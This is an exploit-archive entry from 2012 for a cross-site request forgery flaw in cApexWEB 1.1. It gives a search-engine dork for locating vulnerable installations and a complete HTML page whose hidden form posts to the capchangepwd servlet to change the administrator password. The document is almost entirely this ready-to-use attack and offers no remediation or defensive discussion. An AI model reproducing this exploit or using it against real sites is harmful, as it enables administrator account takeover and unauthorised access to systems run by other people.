id: 18334
date: 05/23/2012
title: cApexWEB 1.1 CSRF Vulnerability (Change Password Admin)
author: AtT4CKxT3rR0r1ST
cves: 

cApexWEB 1.1 CSRF Vulnerability (Change Password Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"cApexWEB"
####################################################################

===[ Exploit ]===

<html>
<head>
<title>cApexWEB 1.1 [Change Password Admin]</title>
</head>
<H2>CSRF Change Password Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://SITE/capexweb/servlet/capexweb.capchangepwd">
<input type="hidden" name="dfpassword" value="ANA1ANA1"/>
<input type="hidden" name="dfpasswordnew" value="ANA1ANA1"/>
<input type="hidden" name="dfcaller" value="FQ"/>
<input type="hidden" name="dfbranch" value="null"/>
<input type="hidden" name="dflogintype" value="Branch"/>
<input type="hidden" name="B1" value="Save"/>
</form>

</body>
</html>
####################################################################



#  0day.today [2023-03-24]  #